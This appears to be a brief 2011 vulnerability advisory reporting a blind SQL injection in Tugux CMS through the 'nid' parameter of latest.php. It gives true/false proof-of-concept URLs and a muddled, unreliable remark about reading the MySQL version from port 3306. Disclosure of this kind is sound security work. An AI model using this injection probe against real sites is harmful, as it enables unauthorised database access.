Tugux CMS suffers from a remote blind SQL injection vulnerability.
027a89cf21f6da1b203504b24958402eb4372d4e3bca289e626cd2f604f23352
===================================================================
Tugux CMS (nid) BLIND sql injection vulnerability
===================================================================
Software: Tugux CMS
Vendor: www.tugux.com
Vuln Type: BLind SQL Injection
Download link: https://sourceforge.net/projects/tuguxcms/files/tuguxCMS_v.1.0_final.rar/download
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
References: https://eidelweiss-advisories.blogspot.com/2011/03/tugux-cms-nid-blind-sql-injection.html
===================================================================
exploit & p0c
[!] latest.php?nid=[valid nid]
Example p0c
[!] https://server/latest.php?nid=9 <= True
[!] https://server/latest.php?nid=-9 <= False
[+] https://server:3306 <= download the file , save and open with c++ or wordpad will show mysql version
[!] sample: https://server:3306 result : 5.0.92-community (use versi 5.0.92) :D
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
===================================================================
==========================| -=[ E0F ]=- |==========================